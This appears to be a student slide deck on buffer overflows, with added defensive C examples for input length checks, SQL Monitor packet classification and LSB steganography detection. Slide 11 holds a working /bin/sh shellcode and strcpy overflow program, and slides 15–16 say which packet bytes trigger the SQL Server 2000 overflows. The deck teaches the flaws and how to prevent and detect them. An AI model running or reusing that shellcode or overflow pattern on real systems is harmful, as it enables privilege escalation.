Buffer Overflow: A Short Study

  1. Buffer overflow: a short study
     Jonathan Hutchison
     Robert Lee
     Connor Mahoney
     Caleb Wherry
  2. Overview
     Buffer Overflows
       C/C++
       SQL
       Images
       Steganography
         Traditional
         Digital
     Basic Concepts
       Buffer
       Stack Memory
       Heap Memory
       Buffer Overflow
       C/C++
       SQL
       Steganography
  9. C/C++ Buffer Overflow Vulnerabilities
     C/C++ On Older Linux Machines
       Easiest to exploit.
       Few protections against segmentation faults.
       Many simple programs can cause serious damage on these machines.
     Code Libraries
       Not trusted libraries.
       Unstable functions.
       Unsecured error checking.
  10. C/C++ Buffer Overflow Vulnerabilities (cont.)
      Exploitation Using Shell Code
        Shell Code
        Unstable C commands
      C Example:
        Use of shell code to switch the user to “root”
        Use of the “strcpy()” function in C to cause a buffer overflow.
        Dangerous for someone running an unsecured Linux machine.
  11. #include <stdio.h>
      #include <string.h>

      char shellcode[] =
          "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
          "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
          "\x80\xe8\xdc\xff\xff\xff/bin/sh";
          // Shell code that will be executed once the buffer is
          // overflowed. It allows us to change the stance of our
          // login to “root”.

      char large_string[128];

      int main(int argc, char *argv[])
      {
          char buffer[96]; // buffer to overflow
          int i;
          long *long_ptr = (long *)large_string;

          // These for loops take the shell code and translate it into
          // the large string and then in turn put a full buffer into
          // each pointer value of the large_string
          for (i = 0; i < 32; i++)
              *(long_ptr + i) = (int)buffer;
          for (i = 0; i < (int)strlen(shellcode); i++)
              large_string[i] = shellcode[i];

          // The string copy function in C should be used with the
          // utmost caution. This is where the code blows up and causes
          // the program to execute the rest of the shell code on the
          // command line.
          strcpy(buffer, large_string);
          return 0;
      }
  12. Prevention of Buffer Overflow In C/C++
      Use only trusted libraries when writing code.
      Use updated software that helps prevent overflow.
      Make sure your code checks the user input.
      Use trusted programs, don’t use untested software.
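Added example, not code from the slides or their authors: the same 96-byte stack buffer as the slide's program, but with the strcpy() replaced by a copy that checks the length before writing, which is what "make sure your code checks the user input" means in practice. The names bounded_copy, accept_input and accept_repeated are chosen for this example; the 96-byte buffer and the 127-byte input length come from the slide, the other inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the slides: a length-checked replacement
 * for the strcpy() call in the slide's overflow program. The buffer size
 * (96) matches the slide; everything else here is constructed. */

#define BUF_SIZE 96

/* Copies src into dst only if it fits, terminator included.
 * Returns 0 on success, -1 if the input is rejected; on rejection dst is
 * left untouched, so the caller never holds a half-copied string. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0 || len >= dst_size)
        return -1;                  /* would overflow: refuse, don't truncate silently */
    memcpy(dst, src, len + 1);      /* copy the bytes and the NUL in one step */
    return 0;
}

/* Stands in for a function that receives untrusted input. Returns the
 * accepted length, or -1 if the input was rejected before any copy. */
int accept_input(const char *input)
{
    char buffer[BUF_SIZE];          /* same 96-byte stack buffer as the slide */
    if (bounded_copy(buffer, sizeof buffer, input) != 0)
        return -1;
    return (int)strlen(buffer);
}

/* Builds an input of n copies of c (n capped at 255) and feeds it to
 * accept_input(), so the boundary can be exercised without a real client. */
int accept_repeated(char c, size_t n)
{
    char input[256];
    if (n > sizeof input - 1)
        n = sizeof input - 1;
    memset(input, c, n);
    input[n] = '\0';
    return accept_input(input);
}

int main(void)
{
    /* Constructed inputs around the 96-byte boundary. */
    printf("5 bytes   -> %d\n", accept_repeated('A', 5));    /* 5: fits */
    printf("95 bytes  -> %d\n", accept_repeated('A', 95));   /* 95: largest that fits with the NUL */
    printf("96 bytes  -> %d\n", accept_repeated('A', 96));   /* -1: no room for the terminator */
    printf("127 bytes -> %d\n", accept_repeated('A', 127));  /* -1: the slide's large_string length */
    return 0;
}
```

The check is `len >= dst_size`, not `>`, because the terminator needs its own byte; a 96-character input into a 96-byte buffer is the off-by-one that strncpy() silently turns into an unterminated string, so the copy refuses it outright instead.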
  13. Prevention of Buffer Overflow In C/C++ (cont.)
      Administrative Point of View
        Don’t compromise quality for quantity.
        Don’t rush deadlines.
        Make sure your programmers are happy and comfortable. Working conditions matter.
        Error checking for all inputs is a must.
        Don’t cut corners.
        Use software such as Flawfinder and Viega’s RATS for possible code problems.
  14. Buffer Overflow In SQL
      SQL – Structured Query Language
      Popular query language for relational database management.
      In 2002, a Buffer Overflow vulnerability was discovered in Microsoft SQL Server 2000.
      Both Stack based and Heap based attacks.
      Attacks carried out through UDP port 1434
        SQL Monitor Port
        Commonly used by legitimate clients attempting to connect.
        Single byte packet, set to 0x02
  15. Stack Based Buffer Overflow Attack
      First byte set to 0x04
      Instructs SQL monitor to open registry key
      If followed by a large number of bytes, stack based buffer is overflowed.
      Return address overwritten
      Redirects SQL server process to execute code of attacker’s choice.
  16. Heap Based Buffer Overflow Attack
      Carried out using similar technique
      First byte set to 0x08 followed by a message with a certain format.
      Formatted properly, attack avoids access violation errors before heap is overflowed.
      Vulnerability in SQL server 2000 code
        Return values not validated
        Unhandled exceptions
      Current process fails, resulting effectively in a denial of service attack.
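Added example, not code from the slides or their authors, covering slides 14 to 16 from the defender's side: a classifier for the leading byte of a datagram on UDP port 1434 (the SQL Monitor port), using only the three values the slides describe: 0x02 as the single-byte client discovery packet, 0x04 as the registry-key request that overflows the stack when followed by a large number of bytes, and 0x08 as the first byte of the heap-overflow message. The slides give no size for "a large number of bytes", so the 64-byte cutoff, the verdict names and the sample datagrams are all constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the slides: a first-byte classifier for
 * datagrams arriving on UDP/1434, the SQL Monitor port, using only the
 * three leading values the slides describe (0x02 discovery ping, 0x04
 * registry-key request, 0x08 heap-overflow message). It is the kind of
 * check a sensor rule would start from; it does not parse the rest. */

enum verdict {
    V_EMPTY,            /* zero-length datagram, nothing to classify */
    V_PING,             /* single 0x02 byte: the normal client discovery packet */
    V_PING_OVERSIZED,   /* 0x02 with trailing bytes: not the single-byte form */
    V_REG_REQUEST,      /* 0x04 with a short payload */
    V_STACK_OVERFLOW,   /* 0x04 with a long payload: the stack overflow pattern */
    V_HEAP_PATTERN,     /* 0x08 leading byte: inspect, the heap variant starts this way */
    V_OTHER             /* any other leading byte */
};

/* Assumption: the slides say only "a large number of bytes". 64 is a
 * constructed cutoff for this example, not a value from the slides. */
#define REG_REQUEST_MAX_PAYLOAD 64

enum verdict classify_sqlmonitor(const uint8_t *pkt, size_t len)
{
    if (len == 0)
        return V_EMPTY;
    switch (pkt[0]) {
    case 0x02:
        return len == 1 ? V_PING : V_PING_OVERSIZED;
    case 0x04:
        return (len - 1) > REG_REQUEST_MAX_PAYLOAD ? V_STACK_OVERFLOW : V_REG_REQUEST;
    case 0x08:
        return V_HEAP_PATTERN;
    default:
        return V_OTHER;
    }
}

const char *verdict_name(enum verdict v)
{
    static const char *names[] = {
        "empty", "ping", "ping-oversized", "registry-request",
        "stack-overflow-pattern", "heap-pattern", "other"
    };
    return names[v];
}

/* Builds a datagram of one leading byte plus n filler bytes (n capped at
 * 511) and classifies it: constructed traffic for demos and tests. */
enum verdict classify_synthetic(uint8_t first, size_t n)
{
    uint8_t pkt[512];
    if (n > sizeof pkt - 1)
        n = sizeof pkt - 1;
    pkt[0] = first;
    memset(pkt + 1, 0x41, n);
    return classify_sqlmonitor(pkt, n + 1);
}

int main(void)
{
    /* Constructed sample datagrams: leading byte and filler length. */
    struct { uint8_t first; size_t n; } samples[] = {
        { 0x02, 0 },    /* legitimate discovery ping */
        { 0x04, 16 },   /* short registry request */
        { 0x04, 400 },  /* 0x04 followed by a large payload */
        { 0x08, 32 },   /* heap message */
        { 0x7f, 8 }     /* unknown type */
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("first=0x%02x len=%zu -> %s\n", samples[i].first, samples[i].n + 1,
               verdict_name(classify_synthetic(samples[i].first, samples[i].n)));
    return 0;
}
```

A legitimate client sends exactly one 0x02 byte, so anything on this port that is either longer than that or starts with 0x04 or 0x08 is worth logging; blocking UDP 1434 at the perimeter removes the whole question for hosts that only serve local clients.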
  17. Buffer Overflow In Images
      iPhone
        www.jailbreakme.com
        Alter file header in TIFF image
        New memory pointer
        Crashes browser
        Unlocks file system
  18. Other exploits
      Windows
        JPEG (GDI+ API)
        BMP
        GIF
      Linux
        PNG
      Macintosh, iPhone, & PSP
        TIFF
  19. Traditional Steganography
      Image from a laser printer under 10x magnification
  20. Traditional Steganography (cont.)
  21. Digital Steganography
      How it works
        Each pixel has 24 bits for 3 colors (255 shades/color)
        Change 1 or 2 color bits every pixel
        Adds up quickly
        Bits can be encoded & decoded with a program
        No quality or size difference
      Images
      Video
      Audio
  22. Detection and Prevention
      Compare with an original by checksum
      Check same color pixels for different values
      Statistical analysis
      Algorithm detection
      Compression & formatting
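Added example, not code from the slides or their authors, covering slides 21 and 22 together: the "change one color bit every pixel" scheme written out as an embed and extract pair over a raw 24-bit RGB buffer, followed by the first two checks on the detection slide, a checksum against the original and a count of pixels whose color values differ. The 8x8 gradient image, the FNV-1a checksum, the message "hi" and the function names are all constructed for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the slides: one-bit LSB embedding in a raw
 * 24-bit RGB buffer, the matching extractor, and the two checks listed
 * first on the "Detection and Prevention" slide. Image and message are
 * constructed; FNV-1a stands in for whatever hash the original was filed with. */

#define WIDTH 8
#define HEIGHT 8
#define IMAGE_BYTES (WIDTH * HEIGHT * 3)   /* 192 colour bytes, 64 pixels */
#define CAPACITY (IMAGE_BYTES / 8)         /* one message bit per colour byte */

/* Writes msg_len bytes, most significant bit first, into the low bit of
 * successive colour bytes. Returns bytes embedded, 0 if it does not fit. */
size_t lsb_embed(uint8_t *img, size_t img_len, const uint8_t *msg, size_t msg_len)
{
    if (msg_len * 8 > img_len)
        return 0;
    for (size_t i = 0; i < msg_len * 8; i++) {
        uint8_t bit = (msg[i / 8] >> (7 - i % 8)) & 1;
        img[i] = (uint8_t)((img[i] & 0xFE) | bit);   /* replace only the LSB */
    }
    return msg_len;
}

/* Reads msg_len bytes back out of the low bits. */
size_t lsb_extract(const uint8_t *img, size_t img_len, uint8_t *out, size_t msg_len)
{
    if (msg_len * 8 > img_len)
        return 0;
    memset(out, 0, msg_len);
    for (size_t i = 0; i < msg_len * 8; i++)
        out[i / 8] |= (uint8_t)((img[i] & 1) << (7 - i % 8));
    return msg_len;
}

/* Check 1: a checksum of the pixel data. Any embedded bit changes it. */
uint32_t fnv1a32(const uint8_t *data, size_t len)
{
    uint32_t h = 0x811c9dc5u;
    for (size_t i = 0; i < len; i++) {
        h ^= data[i];
        h *= 0x01000193u;
    }
    return h;
}

/* Check 2: number of pixels where any of the three channels differs. */
size_t changed_pixels(const uint8_t *orig, const uint8_t *img, size_t len)
{
    size_t n = 0;
    for (size_t p = 0; p + 2 < len; p += 3)
        if (orig[p] != img[p] || orig[p + 1] != img[p + 1] || orig[p + 2] != img[p + 2])
            n++;
    return n;
}

/* Runs embed -> extract -> both checks on a constructed gradient image.
 * Returns 1 if the message survived the round trip, 0 otherwise, and
 * reports the two detection results through the out-parameters. */
int lsb_demo(const char *secret, size_t *pixels_changed, int *checksum_differs)
{
    uint8_t original[IMAGE_BYTES], stego[IMAGE_BYTES], recovered[CAPACITY + 1];
    size_t len = strlen(secret);
    if (len > CAPACITY)
        return 0;
    for (size_t i = 0; i < IMAGE_BYTES; i++)       /* constructed cover image */
        original[i] = (uint8_t)(i * 37);
    memcpy(stego, original, IMAGE_BYTES);
    if (lsb_embed(stego, IMAGE_BYTES, (const uint8_t *)secret, len) != len)
        return 0;
    lsb_extract(stego, IMAGE_BYTES, recovered, len);
    recovered[len] = '\0';
    *pixels_changed = changed_pixels(original, stego, IMAGE_BYTES);
    *checksum_differs = fnv1a32(original, IMAGE_BYTES) != fnv1a32(stego, IMAGE_BYTES);
    return strcmp((const char *)recovered, secret) == 0;
}

/* Scalar wrappers so each result can be checked on its own. */
size_t demo_pixels_changed(const char *secret)
{
    size_t changed = 0; int differs = 0;
    return lsb_demo(secret, &changed, &differs) ? changed : (size_t)-1;
}
int demo_checksum_differs(const char *secret)
{
    size_t changed = 0; int differs = 0;
    return lsb_demo(secret, &changed, &differs) ? differs : -1;
}

int main(void)
{
    size_t changed; int differs;
    int ok = lsb_demo("hi", &changed, &differs);
    printf("round trip ok=%d, pixels changed=%zu of %d, checksum differs=%d\n",
           ok, changed, WIDTH * HEIGHT, differs);
    return 0;
}
```

Two bytes of message touch only five of the 64 pixels and never by more than one shade per channel, which is why the slide says there is no visible quality or size difference; the checksum check catches it anyway because it does not care how small the change is, but it only works when a trusted original is available to compare against, which is the case the statistical methods on the slide are there for.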
  23. Example
      Hidden image
      Original image